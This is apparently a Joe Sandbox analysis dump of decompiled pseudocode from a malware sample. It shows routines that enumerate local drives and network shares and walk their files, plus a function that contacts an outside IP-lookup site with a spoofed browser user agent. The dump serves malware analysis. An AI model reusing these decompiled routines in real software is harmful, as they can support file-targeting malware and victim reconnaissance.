												if(__ebx == 0) {
													__eax =  &_v608;
													_push( &_v608);
													_push(__edi);
													_push( *0x43fd70);
													 *__esi() = _v608();
													_pop(__ecx);
													_pop(__ecx);
												}
											}
											__eflags =  *__edi - 0x2d;
											if( *__edi == 0x2d) {
												_v532 = _v532 | 0x00000100;
												__edi = __edi + 1;
												__eflags = __edi;
												_v544 = __edi;
											}
											_push(__edi);
											L105:
											__eax = E0042D200();
											_pop(__ecx);
											goto L194;
										}
										__eflags = __eax - 0x69;
										if(__eax == 0x69) {
											L120:
											_t177 =  &_v532;
											 *_t177 = _v532 | 0x00000040;
											__eflags =  *_t177;
											goto L121;
										}
										__eflags = __eax - 0x6e;
										if(__eax == 0x6e) {
											__esi =  *__ebx;
											__ebx = __ebx + 4;
											_v556 = __ebx;
											__eax = E00425A58();
											__eflags = __eax;
											if(__eflags == 0) {
												goto L2;
											}
											__eflags = _v532 & 0x00000020;
											if((_v532 & 0x00000020) == 0) {
												__eax = _v552;
												 *__esi = __eax;
											} else {
												 *__esi = _v552;
											}
											_v584 = 1;
											goto L227;
										}
										__eflags = __eax - 0x6f;
										if(__eax != 0x6f) {
											goto L195;
										}
										__eflags = _v532 & 0x00000080;
										_v548 = 8;
										if((_v532 & 0x00000080) != 0) {
											_v532 = _v532 | 0x00000200;
										}
										goto L122;
									}
									if(__eflags == 0) {
										goto L120;
									}
									__eflags = __eax - 0x53;
									if(__eflags > 0) {
										__eax = __eax - 0x58;
										__eflags = __eax;
										if(__eax == 0) {
											goto L143;
										}
										__eax = __eax - 1;
										__eax = __eax - 1;
										__eflags = __eax;
										if(__eax == 0) {
											__eax =  *__ebx;
											__ebx = __ebx + 4;
											_v556 = __ebx;
											__eflags = __eax - __esi;
											if(__eax == __esi) {
												L104:
												__eax =  *0x43f1d0; // 0x43133c
												_v544 = __eax;
												_push(__eax);
												goto L105;
											}
											__ecx =  *(__eax + 4);
											__eflags = __ecx - __esi;
											if(__ecx == __esi) {
												goto L104;
											}
											__eflags = _v532 & 0x00000800;
											__eax =  *__eax;
											_v544 = __ecx;
											if((_v532 & 0x00000800) == 0) {
												_v572 = __esi;
											} else {
												asm("cdq");
												__eax = __eax - __edx;
												__eax = __eax >> 1;
												_v572 = 1;
											}
											goto L194;
										}
										__eax = __eax - __ecx;
										__eflags = __eax;
										if(__eax == 0) {
											goto L78;
										}
										__eax = __eax - 1;
										__eax = __eax - 1;
										__eflags = __eax;
										if(__eax != 0) {
											goto L195;
										}
										L94:
										__ebx = __ebx + 4;
										__eflags = _v532 & 0x00000810;
										_v556 = __ebx;
										if((_v532 & 0x00000810) == 0) {
											__al =  *(__ebx - 4);
											_v528 = __al;
											_v548 = 1;
										} else {
											 *(__ebx - 4) & 0x0000ffff =  &_v528;
											__eax =  &_v548;
											__eax = E0042D3E0( &_v548,  &_v528, 0x200,  *(__ebx - 4) & 0x0000ffff);
											__eflags = __eax;
											if(__eax != 0) {
												_v584 = 1;
											}
										}
										__eax =  &_v528;
										_v544 = __eax;
										goto L195;
									}
									if(__eflags == 0) {
										__eflags = _v532 & 0x00000830;
										if((_v532 & 0x00000830) == 0) {
											_t130 =  &_v532;
											 *_t130 = _v532 | 0x00000800;
											__eflags =  *_t130;
										}
										goto L84;
									}
									__eax = __eax - 0x41;
									__eflags = __eax;
									if(__eax == 0) {
										L77:
										__dl = __dl + 0x20;
										__eflags = __dl;
										_v624 = 1;
										_v533 = __dl;
										goto L78;
									}
									__eax = __eax - 1;
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										__eflags = _v532 & 0x00000830;
										if((_v532 & 0x00000830) == 0) {
											_v532 = _v532 | 0x00000800;
										}
										goto L94;
									}
									__eax = __eax - 1;
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L77;
									}
									__eax = __eax - 1;
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L195;
									}
									goto L77;
							}
						}
						goto L231;
					}
					_t355 = E0042B537(_t381);
					_t375 = 0x43fbf0;
					__eflags = _t355 - 0xffffffff;
					if(_t355 == 0xffffffff) {
						L9:
						_t369 = _t375;
						L10:
						__eflags =  *(_t369 + 0x24) & 0x0000007f;
						if(__eflags != 0) {
							goto L2;
						}
						__eflags = _t355 - 0xffffffff;
						if(_t355 == 0xffffffff) {
							L14:
							_t356 = _t375;
							L15:
							__eflags =  *(_t356 + 0x24) & 0x00000080;
							if(__eflags != 0) {
								goto L2;
							}
							goto L16;
						}
						__eflags = _t355 - 0xfffffffe;
						if(_t355 == 0xfffffffe) {
							goto L14;
						} else {
							_t356 = ((_t355 & 0x0000001f) << 6) +  *((intOrPtr*)(0x482280 + (_t355 >> 5) * 4));
							goto L15;
						}
					}
					__eflags = _t355 - 0xfffffffe;
					if(_t355 == 0xfffffffe) {
						goto L9;
					} else {
						_t369 = ((_t355 & 0x0000001f) << 6) +  *((intOrPtr*)(0x482280 + (_t355 >> 5) * 4));
						goto L10;
					}
				} else {
					L2:
					 *((intOrPtr*)(E00427125(_t392))) = 0x16;
					_t344 = E004270D3();
					if(_v596 != 0) {
						_t344 = _v600;
						 *(_t344 + 0x70) =  *(_t344 + 0x70) & 0xfffffffd;
					}
					_t345 = _t344 | 0xffffffff;
					L234:
					_pop(_t378);
					_pop(_t383);
					_pop(_t361);
					return E004256FE(_t345, _t361, _v8 ^ _t387, _t375, _t378, _t383);
				}
			}

0x004271e2
0x004271e5
0x004271ed
0x004271f4
0x004271fc
0x00427205
0x0042720e
0x00427214
0x0042721a
0x00427220
0x00427226
0x0042722c
0x00427232
0x00427238
0x0042723e
0x00427244
0x00427249
0x0042724b
0x00427278
0x0042727c
0x004272dc
0x004272dc
0x004272de
0x004272e0
0x00000000
0x00000000
0x004272e6
0x004272e8
0x004272ea
0x004272f0
0x004272f6
0x004272fc
0x00427302
0x00427304
0x00427d43
0x00427d43
0x00427d4a
0x00427d4c
0x00427d52
0x00427d52
0x00427d52
0x00427d52
0x00427d56
0x00000000
0x00000000
0x00000000
0x00000000
0x0042730a
0x0042730a
0x0042730b
0x00427311
0x00427317
0x00000000
0x0042731d
0x0042731d
0x00427320
0x00427322
0x00427333
0x00427333
0x00427324
0x0042732e
0x0042732e
0x00427322
0x00427335
0x0042733f
0x00427342
0x00427343
0x00427349
0x0042734b
0x00427d1c
0x00427d1c
0x00427d22
0x00427d24
0x00427d2a
0x00427d2c
0x00000000
0x00000000
0x00427d2e
0x00427d3a
0x00427d3c
0x00000000
0x00427d3c
0x00427351
0x00000000
0x00427559
0x00427559
0x00427567
0x0042756b
0x00427570
0x00427571
0x00427573
0x00427579
0x0042757a
0x0042759e
0x0042759e
0x004275a4
0x004275aa
0x00000000
0x004275aa
0x0042757c
0x00427582
0x00427588
0x0042758d
0x0042758f
0x00427590
0x00427596
0x00427598
0x00000000
0x00000000
0x00000000
0x00000000
0x00427358
0x0042735f
0x00427365
0x0042736b
0x00427371
0x00427377
0x0042737d
0x00000000
0x00000000
0x00427388
0x0042738b
0x0042738b
0x0042738e
0x004273da
0x00427390
0x00427390
0x00427390
0x00427393
0x004273cb
0x00427395
0x00427395
0x00427395
0x00427398
0x004273bf
0x0042739a
0x0042739a
0x0042739b
0x0042739b
0x0042739c
0x004273b3
0x0042739e
0x0042739e
0x0042739e
0x004273a1
0x004273a7
0x004273a7
0x004273a1
0x0042739c
0x00427398
0x00427393
0x00000000
0x00000000
0x004273e6
0x004273e9
0x0042741d
0x00427420
0x00427423
0x00427427
0x004273eb
0x004273eb
0x004273ee
0x004273f4
0x004273f4
0x004273f7
0x004273fd
0x004273ff
0x00427405
0x0042740c
0x0042740c
0x004273ff
0x00000000
0x00000000
0x00427432
0x00000000
0x00000000
0x0042743d
0x00427440
0x0042746e
0x00427471
0x00427474
0x00427478
0x00427442
0x00427442
0x00427445
0x0042744b
0x0042744e
0x00427454
0x00427456
0x0042745c
0x0042745c
0x00427456
0x00000000
0x00000000
0x00427483
0x00427486
0x004274dd
0x004274df
0x004274e1
0x00427501
0x00427501
0x00427503
0x00427523
0x00427523
0x00427525
0x00000000
0x00000000
0x0042752b
0x0042752d
0x00000000
0x00000000
0x00427533
0x00427535
0x00000000
0x00000000
0x0042753b
0x0042753d
0x00000000
0x00000000
0x00427543
0x00427545
0x00000000
0x00000000
0x0042754b
0x0042754d
0x00000000
0x00000000
0x00427553
0x00000000
0x00427553
0x00427505
0x00427509
0x00000000
0x00000000
0x0042750b
0x0042750e
0x00427518
0x00000000
0x00427518
0x004274e3
0x004274e7
0x00000000
0x00000000
0x004274e9
0x004274ec
0x004274f6
0x00427488
0x00427488
0x0042748b
0x004274d1
0x0042748d
0x0042748d
0x00427490
0x004274aa
0x004274ad
0x004274c5
0x004274af
0x004274af
0x004274b0
0x004274ba
0x004274ba
0x00427492
0x00427492
0x00427495
0x0042749b
0x0042749b
0x00427495
0x00427490
0x0042748b
0x00000000
0x00000000
0x004275b4
0x004275b7
0x004275ba
0x004277a8
0x004277ab
0x004279a5
0x004279a5
0x004279a8
0x0042766b
0x0042766b
0x00427671
0x00427674
0x00427676
0x00427676
0x0042767b
0x0042767e
0x00427688
0x0042768e
0x00427691
0x00427697
0x00427b48
0x00427b4a
0x00427b4c
0x00427b51
0x00427b51
0x00427b57
0x00427b66
0x00427b66
0x00427b68
0x00000000
0x00000000
0x00427b5f
0x00427b60
0x00427b63
0x00000000
0x00000000
0x00427b65
0x00427b65
0x00427b65
0x00427b6a
0x00427b6a
0x00000000
0x0042769d
0x0042769d
0x0042769f
0x004276a1
0x004276a6
0x004276a6
0x004276ac
0x004276b2
0x00427b3a
0x00427b3a
0x00427b3c
0x00000000
0x00000000
0x00427b31
0x00427b32
0x00427b35
0x00000000
0x00000000
0x00427b37
0x00427b37
0x00427b37
0x00427b3e
0x00427b44
0x00427b70
0x00427b70
0x00427b76
0x00427b76
0x00427b7d
0x00427d00
0x00427d00
0x00427d07
0x00427d0f
0x00427d14
0x00427d14
0x00427d14
0x00427d1b
0x00000000
0x00427d07
0x00427b83
0x00427b89
0x00427b8b
0x00427bbf
0x00427bc5
0x00427bcb
0x00427bd1
0x00427bd7
0x00427bd9
0x00427c02
0x00427c02
0x00427c08
0x00427c0e
0x00427c15
0x00427c1b
0x00427c20
0x00427c28
0x00427c52
0x00427c52
0x00427c59
0x00427c5f
0x00427cb5
0x00427cbb
0x00427cc1
0x00427cc3
0x00427cc9
0x00427cc9
0x00427cd0
0x00000000
0x00000000
0x00427cd2
0x00427cd9
0x00000000
0x00000000
0x00427cdb
0x00427cfc
0x00427cfc
0x00427cfe
0x00000000
0x00000000
0x00427ce3
0x00427ce9
0x00427ceb
0x00427ced
0x00427cee
0x00427cf3
0x00427cfa
0x00000000
0x00000000
0x00427cfa
0x00000000
0x00427cfc
0x00427c61
0x00427c63
0x00000000
0x00000000
0x00427c65
0x00427c6b
0x00427c71
0x00427c75
0x00427c7c
0x00427c7d
0x00427c80
0x00427c88
0x00427c8a
0x00000000
0x00000000
0x00427c8c
0x00427c92
0x00427c94
0x00000000
0x00000000
0x00427c96
0x00427c9a
0x00427ca0
0x00427ca6
0x00427ca8
0x00000000
0x00000000
0x00000000
0x00427caa
0x00427cac
0x00000000
0x00427cac
0x00427c2a
0x00427c31
0x00000000
0x00000000
0x00427c4e
0x00427c4e
0x00427c50
0x00000000
0x00000000
0x00427c35
0x00427c3b
0x00427c3d
0x00427c3f
0x00427c40
0x00427c45
0x00427c4c
0x00000000
0x00000000
0x00427c4c
0x00000000
0x00427c4e
0x00427bdb
0x00427bdd
0x00427bdf
0x00000000
0x00000000
0x00000000
0x00000000
0x00427be1
0x00427be1
0x00427be1
0x00427be7
0x00427bed
0x00427bef
0x00427bf0
0x00427bf5
0x00427bfc
0x00000000
0x00000000
0x00427bfe
0x00427c00
0x00000000
0x00000000
0x00000000
0x00427c00
0x00000000
0x00427be1
0x00427b8d
0x00427b92
0x00427b9d
0x00427b9f
0x00427baa
0x00427bac
0x00000000
0x00000000
0x00427bae
0x00427bb5
0x00427bb5
0x00000000
0x00427bb5
0x00427ba1
0x00000000
0x00427ba1
0x00427b94
0x00000000
0x00427b94
0x00427697
0x004279ae
0x004279af
0x004279af
0x004279b0
0x00427846
0x00427846
0x00427850
0x00427850
0x00427856
0x0042785c
0x00427a04
0x00427a0a
0x00000000
0x00000000
0x00427a10
0x00427a13
0x00427a16
0x00427a30
0x00427a33
0x00427a36
0x00427a3b
0x00427a3b
0x00427a38
0x00427a38
0x00427a38
0x00427a3d
0x00427a3d
0x00427a43
0x00427a43
0x00427a46
0x00427a63
0x00427a63
0x00427a6d
0x00427a6f
0x00427a71
0x00427a73
0x00427a73
0x00427a73
0x00427a75
0x00427a7c
0x00427a8a
0x00427a91
0x00427a96
0x00427a9c
0x00427a9e
0x00427a9e
0x00427a7e
0x00427a7e
0x00427a7e
0x00427aa4
0x00427aa6
0x00427aa6
0x00427aa8
0x00427aaa
0x00427aaa
0x00427aaa
0x00427aaa
0x00427ab0
0x00427ab3
0x00427ab3
0x00427ab9
0x00427abf
0x00427ac1
0x00000000
0x00000000
0x00427ac3
0x00427ac5
0x00427ac5
0x00427ac7
0x00427af6
0x00427af9
0x00427afb
0x00427afc
0x00427b06
0x00427b0c
0x00427b12
0x00000000
0x00000000
0x00427b14
0x00427b16
0x00427b1f
0x00427b1f
0x00427b25
0x00427b2b
0x00427b2e
0x00000000
0x00427b2e
0x00427b18
0x00427b1a
0x00427b1d
0x00000000
0x00000000
0x00000000
0x00427b1d
0x00427ac9
0x00427ac9
0x00427acf
0x00427ad4
0x00427ad9
0x00427adc
0x00427ae2
0x00427ae4
0x00427ae6
0x00427ae9
0x00427aeb
0x00427aeb
0x00427aeb
0x00427af1
0x00427af3
0x00427ab3
0x00427ab9
0x00427abf
0x00427ac1
0x00000000
0x00000000
0x00000000
0x00427ac1
0x00427ab3
0x00427a48
0x00427a4a
0x00000000
0x00000000
0x00427a4c
0x00427a52
0x00427a52
0x00427a54
0x00427a57
0x00427a59
0x00427a59
0x00427a59
0x00000000
0x00427a59
0x00427a4e
0x00427a50
0x00000000
0x00000000
0x00000000
0x00427a50
0x00427a18
0x00427a1e
0x00427a21
0x00427a29
0x00427a23
0x00427a23
0x00427a23
0x00427a2d
0x00000000
0x00427a2d
0x00427862
0x00427862
0x00427864
0x00427867
0x00000000
0x00427867
0x004279b6
0x004279b6
0x004279b9
0x00000000
0x00000000
0x004279bf
0x004279c9
0x004279c9
0x004279d0
0x004279da
0x004279e0
0x004279e6
0x004279e8
0x004279ef
0x004279f5
0x004279f5
0x00000000
0x004279da
0x004277b1
0x00427993
0x0042799d
0x0042799d
0x00000000
0x0042799d
0x004277b7
0x004277ba
0x00000000
0x00000000
0x004277c0
0x004277c3
0x004275fd
0x004275fd
0x00427604
0x0042760a
0x0042760f
0x00427615
0x0042761b
0x00427621
0x0042786f
0x00427882
0x00427888
0x0042788a
0x0042788a
0x00427890
0x0042789a
0x0042789c
0x004278a2
0x004278a9
0x004278ae
0x004278b5
0x004278bb
0x004278bd
0x004278cf
0x004278bf
0x004278bf
0x004278c5
0x004278cb
0x004278cb
0x004278bd
0x00427871
0x00427871
0x00427874
0x00427876
0x00427876
0x00427874
0x00427627
0x00427627
0x00427627
0x004278d9
0x004278db
0x004278e1
0x004278e4
0x004278ea
0x004278ed
0x004278f3
0x004278f9
0x004278fa
0x00427900
0x00427903
0x00427909
0x0042790f
0x00427910
0x00427916
0x0042791c
0x0042791d
0x0042791e
0x00427926
0x00427928
0x0042792e
0x00427931
0x00427931
0x00427937
0x00427939
0x00427940
0x00427942
0x00427948
0x00427949
0x0042794a
0x00427952
0x00427954
0x00427955
0x00427955
0x00427940
0x00427956
0x0042795d
0x0042795f
0x00427961
0x00427963
0x00427969
0x0042796a
0x0042796b
0x00427973
0x00427975
0x00427976
0x00427976
0x00427961
0x00427977
0x0042797a
0x0042797c
0x00427986
0x00427986
0x00427987
0x00427987
0x0042798d
0x0042779d
0x0042779d
0x004277a2
0x00000000
0x004277a2
0x004277c9
0x004277cc
0x0042783f
0x0042783f
0x0042783f
0x0042783f
0x00000000
0x0042783f
0x004277ce
0x004277d1
0x004277fb
0x004277fd
0x00427800
0x00427806
0x0042780b
0x0042780d
0x00000000
0x00000000
0x00427813
0x0042781a
0x00427828
0x0042782e
0x0042781c
0x00427823
0x00427823
0x00427830
0x00000000
0x00427830
0x004277d3
0x004277d6
0x00000000
0x00000000
0x004277dc
0x004277e3
0x004277ed
0x004277ef
0x004277ef
0x00000000
0x004277ed
0x004275c0
0x00000000
0x00000000
0x004275c6
0x004275c9
0x004276c1
0x004276c1
0x004276c4
0x00000000
0x00000000
0x004276ca
0x004276cb
0x004276cb
0x004276cc
0x00427747
0x00427749
0x0042774c
0x00427752
0x00427754
0x00427791
0x00427791
0x00427796
0x0042779c
0x00000000
0x0042779c
0x00427756
0x00427759
0x0042775b
0x00000000
0x00000000
0x0042775d
0x00427767
0x0042776a
0x00427770
0x00427786
0x00427772
0x00427772
0x00427773
0x00427775
0x00427777
0x00427777
0x00000000
0x00427770
0x004276ce
0x004276ce
0x004276d0
0x00000000
0x00000000
0x004276d6
0x004276d7
0x004276d7
0x004276d8
0x00000000
0x00000000
0x004276de
0x004276de
0x004276e1
0x004276eb
0x004276f1
0x00427723
0x00427726
0x0042772c
0x004276f3
0x004276fd
0x00427704
0x0042770b
0x00427713
0x00427715
0x00427717
0x00427717
0x00427715
0x00427736
0x0042773c
0x00000000
0x0042773c
0x004275cf
0x00427655
0x0042765f
0x00427661
0x00427661
0x00427661
0x00427661
0x00000000
0x0042765f
0x004275d5
0x004275d5
0x004275d8
0x004275ea
0x004275ea
0x004275ea
0x004275ed
0x004275f7
0x00000000
0x004275f7
0x004275da
0x004275db
0x004275db
0x004275dc
0x00427636
0x00427640
0x00427646
0x00427646
0x00000000
0x00427640
0x004275de
0x004275df
0x004275df
0x004275e0
0x00000000
0x00000000
0x004275e2
0x004275e3
0x004275e3
0x004275e4
0x00000000
0x00000000
0x00000000
0x00000000
0x00427351
0x00000000
0x0042730a
0x0042727f
0x00427285
0x0042728a
0x0042728d
0x004272aa
0x004272aa
0x004272ac
0x004272ac
0x004272b0
0x00000000
0x00000000
0x004272b2
0x004272b5
0x004272d0
0x004272d0
0x004272d2
0x004272d2
0x004272d6
0x00000000
0x00000000
0x00000000
0x004272d6
0x004272b7
0x004272ba
0x00000000
0x004272bc
0x004272c7
0x00000000
0x004272c7
0x004272ba
0x0042728f
0x00427292
0x00000000
0x00427294
0x004272a1
0x00000000
0x004272a1
0x0042724d
0x0042724d
0x00427252
0x00427258
0x00427264
0x00427266
0x0042726c
0x0042726c
0x00427270
0x00427d5c
0x00427d5f
0x00427d60
0x00427d63
0x00427d6a
0x00427d6a

APIs

DecodePointer.KERNEL32(?,?), ref: 00427971

Part of subcall function 0042D11A: Sleep.KERNEL32(00000000,00000001,?,?,0042B986,00000018,0043C2A8,0000000C,0042BA16,?,?,?,0042A922,0000000D), ref: 0042D13B

DecodePointer.KERNEL32(?,?,?,?,000000A3,?,?,0000000C,00000000,00000000,00000020), ref: 00427924
DecodePointer.KERNEL32(?,?), ref: 00427950

Part of subcall function 004258E3: HeapFree.KERNEL32(00000000,00000000), ref: 004258F9
Part of subcall function 004258E3: GetLastError.KERNEL32(00000000,?,0042A9F6,00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000), ref: 0042590B

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

, xrefs: 00427BAE
@, xrefs: 0042783F
', xrefs: 004279BF
g, xrefs: 00427956

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00413840, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

C-Code - Quality: 95%

			E00413840() {
				signed int _v8;
				short _v1036;
				char _v1234;
				short _v1236;
				short _v1238;
				intOrPtr _v1242;
				intOrPtr _v1246;
				intOrPtr _v1250;
				intOrPtr _v1254;
				short _v1256;
				long _v1260;
				long _v1264;
				long _v1268;
				signed int _t35;
				intOrPtr _t38;
				WCHAR* _t45;
				WCHAR* _t46;
				int _t47;
				int _t50;
				WCHAR* _t51;
				signed int _t53;
				WCHAR* _t55;
				intOrPtr* _t60;
				intOrPtr* _t61;
				short _t63;
				short _t64;
				short _t65;
				short _t67;
				short _t68;
				short* _t71;
				short _t72;
				short _t73;
				WCHAR* _t75;
				intOrPtr* _t76;
				long _t78;
				signed int _t79;
				signed int _t81;
				void* _t82;
				void* _t83;
				void* _t92;
				void* _t93;
				void* _t94;

				_t81 = (_t79 & 0xfffffff8) - 0x4f4;
				_t35 =  *0x43f054; // 0xd6baf341
				_v8 = _t35 ^ _t81;
				E004233D0("uuk", 3);
				_t38 =  *0x441d18; // 0x203ea08
				_t78 = 0;
				_t82 = _t81 + 8;
				if( *((intOrPtr*)(_t38 + 4)) == 0) {
					L36:
					ExitThread(1);
				}
				GetLogicalDriveStringsW(0x100,  &_v1036); // executed
				_t75 =  &_v1036;
				_v1236 = 0;
				E0042D0A0( &_v1234, 0, 0xc6);
				_t83 = _t82 + 0xc;
				_v1256 = 0;
				_v1254 = 0;
				_v1250 = 0;
				_v1246 = 0;
				_v1242 = 0;
				_v1238 = 0;
				_v1268 = 0;
				_v1264 = 0;
				_v1260 = 0;
				if(_v1036 == 0) {
					L33:
					E00413740(_t78);
					_t93 =  *0x462840 - _t78; // 0x0
					if(_t93 <= 0) {
						goto L36;
					}
					_t76 = 0x442040;
					do {
						E00413AB0(_t76, 1);
						_t78 = _t78 + 1;
						_t83 = _t83 + 8;
						_t76 = _t76 + 0x800;
						_t94 = _t78 -  *0x462840; // 0x0
					} while (_t94 < 0);
					goto L36;
				} else {
					do {
						_t60 = L"A:\\";
						_t45 = _t75;
						while(1) {
							_t67 =  *_t45;
							if(_t67 !=  *_t60) {
								break;
							}
							if(_t67 == _t78) {
								L8:
								_t45 = 0;
								L10:
								_t46 = _t75;
								if(_t45 != _t78) {
									_t61 = L"B:\\";
									while(1) {
										_t68 =  *_t46;
										if(_t68 !=  *_t61) {
											break;
										}
										if(_t68 == _t78) {
											L19:
											_t46 = 0;
											L21:
											if(_t46 != _t78) {
												_t47 = GetDriveTypeW(_t75); // executed
												if(_t47 == 3 || _t47 == 4 || _t47 == 2) {
													_t50 = GetVolumeInformationW(_t75,  &_v1236, 0xc8,  &_v1268,  &_v1264,  &_v1260,  &_v1256, 0x14); // executed
													if(_t50 == 1) {
														E00413AB0(_t75, _t50); // executed
														_t83 = _t83 + 8;
													}
												}
												_t51 = _t75;
												_t71 =  &(_t51[1]);
												do {
													_t63 =  *_t51;
													_t51 =  &(_t51[1]);
												} while (_t63 != _t78);
												goto L32;
											}
											_t55 = _t75;
											_t71 =  &(_t55[1]);
											do {
												_t64 =  *_t55;
												_t55 =  &(_t55[1]);
											} while (_t64 != _t78);
											goto L32;
										}
										_t72 = _t46[1];
										if(_t72 !=  *((intOrPtr*)(_t61 + 2))) {
											break;
										}
										_t46 =  &(_t46[2]);
										_t61 = _t61 + 4;
										if(_t72 != _t78) {
											continue;
										}
										goto L19;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									goto L21;
								}
								_t71 =  &(_t46[1]);
								do {
									_t65 =  *_t46;
									_t46 =  &(_t46[1]);
								} while (_t65 != _t78);
								goto L32;
							}
							_t73 = _t45[1];
							if(_t73 !=  *((intOrPtr*)(_t60 + 2))) {
								break;
							}
							_t45 =  &(_t45[2]);
							_t60 = _t60 + 4;
							if(_t73 != _t78) {
								continue;
							}
							goto L8;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L10;
						L32:
						_t53 = _t51 - _t71 >> 1;
						_t92 =  *(_t75 + 2 + _t53 * 2) - _t78;
						_t75 = _t75 + 2 + _t53 * 2;
					} while (_t92 != 0);
					goto L33;
				}
			}

0x00413848
0x0041384e
0x00413855
0x00413866
0x0041386b
0x00413870
0x00413872
0x00413878
0x00413a2b
0x00413a2d
0x00413a2d
0x0041388b
0x0041389e
0x004138a5
0x004138aa
0x004138b3
0x004138b6
0x004138bb
0x004138bf
0x004138c3
0x004138c7
0x004138cb
0x004138d0
0x004138d4
0x004138d8
0x004138e4
0x004139fe
0x004139ff
0x00413a04
0x00413a0a
0x00000000
0x00000000
0x00413a0c
0x00413a11
0x00413a14
0x00413a19
0x00413a1a
0x00413a1d
0x00413a23
0x00413a23
0x00000000
0x004138ea
0x004138f0
0x004138f0
0x004138f5
0x004138f7
0x004138f7
0x004138fd
0x00000000
0x00000000
0x00413902
0x00413919
0x00413919
0x00413922
0x00413924
0x00413926
0x00413940
0x00413945
0x00413945
0x0041394b
0x00000000
0x00000000
0x00413950
0x00413967
0x00413967
0x00413970
0x00413972
0x0041398e
0x00413997
0x004139c4
0x004139c9
0x004139cd
0x004139d2
0x004139d2
0x004139c9
0x004139d5
0x004139d7
0x004139e0
0x004139e0
0x004139e3
0x004139e6
0x00000000
0x004139e0
0x00413974
0x00413976
0x00413980
0x00413980
0x00413983
0x00413986
0x00000000
0x0041398b
0x00413952
0x0041395a
0x00000000
0x00000000
0x0041395c
0x0041395f
0x00413965
0x00000000
0x00000000
0x00000000
0x00413965
0x0041396b
0x0041396d
0x00000000
0x0041396d
0x00413928
0x00413930
0x00413930
0x00413933
0x00413936
0x00000000
0x0041393b
0x00413904
0x0041390c
0x00000000
0x00000000
0x0041390e
0x00413911
0x00413917
0x00000000
0x00000000
0x00000000
0x00413917
0x0041391d
0x0041391f
0x00000000
0x004139eb
0x004139ed
0x004139ef
0x004139f4
0x004139f4
0x00000000
0x004138f0

APIs

Part of subcall function 004233D0: GetTickCount.KERNEL32(?,?,?,?,0041386B,uuk,00000003), ref: 004233E1
Part of subcall function 004233D0: Sleep.KERNELBASE(0000000F), ref: 00423417

GetLogicalDriveStringsW.KERNELBASE(00000100,?), ref: 0041388B
GetDriveTypeW.KERNELBASE(?), ref: 0041398E
GetVolumeInformationW.KERNELBASE(?,?,000000C8,?,?,?,?,00000014), ref: 004139C4

Part of subcall function 00413740: WNetOpenEnumW.MPR(00000002,00000000,00000000,00413A04,00413A04), ref: 00413764
Part of subcall function 00413740: GlobalAlloc.KERNEL32(00000040,00004000), ref: 0041377D
Part of subcall function 00413740: WNetEnumResourceW.MPR(FFFFFFFF,FFFFFFFF,00000000,00004000), ref: 004137AE
Part of subcall function 00413740: GlobalFree.KERNEL32(00000000), ref: 0041381A
Part of subcall function 00413740: WNetCloseEnum.MPR(FFFFFFFF), ref: 00413824

Part of subcall function 00413AB0: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00442040,00000001,00000000), ref: 00413B47
Part of subcall function 00413AB0: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00413E1B
Part of subcall function 00413AB0: FindClose.KERNEL32(00000000), ref: 00413E2A

ExitThread.KERNEL32 ref: 00413A2D

Strings

uuk, xrefs: 00413861
B:\, xrefs: 00413940
A:\, xrefs: 004138F0

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 0041BA30, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74

C-Code - Quality: 74%

			E0041BA30(void* __ebx, void* __edx) {
				signed int _v8;
				char _v1031;
				char _v1032;
				char _v1036;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t16;
				void* _t17;
				char* _t20;
				int _t23;
				int _t25;
				void* _t34;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t42;
				void* _t44;
				void* _t45;
				signed int _t47;
				signed int _t50;

				_t34 = __edx;
				_t27 = __ebx;
				_t47 = _t50;
				_t12 =  *0x43f054; // 0xd6baf341
				_v8 = _t12 ^ _t47;
				_v1032 = 0;
				E0042D0A0( &_v1031, 0, 0x3ff);
				_t16 = InternetOpenA("Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko", 4, 0, 0, 0); // executed
				_t38 = _t16;
				_t17 = InternetOpenUrlW(_t38, L"http://ip.tyk.nu/", 0, 0, 0x40000000, 0); // executed
				_t42 = _t17;
				if(_t42 != 0) {
					E0041BB40( &_v1032, 0xc8, _t42,  &_v1036); // executed
					_t20 = _t47 + _v1036 - 0x405;
					if( *_t20 == 0xa) {
						 *_t20 = 0;
					}
					E00425A6E(0x46284c, 0x13,  &_v1032);
					InternetCloseHandle(_t42); // executed
					_t23 = InternetCloseHandle(_t38);
					_pop(_t39);
					_pop(_t44);
					return E004256FE(_t23, _t27, _v8 ^ _t47,  &_v1032, _t39, _t44);
				} else {
					_t25 = InternetCloseHandle(_t38);
					_pop(_t40);
					_pop(_t45);
					return E004256FE(_t25, __ebx, _v8 ^ _t47, _t34, _t40, _t45);
				}
			}

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko,00000004,00000000,00000000,00000000), ref: 0041BA71
InternetOpenUrlW.WININET(00000000,http://ip.tyk.nu/,00000000,00000000,40000000,00000000), ref: 0041BA8A
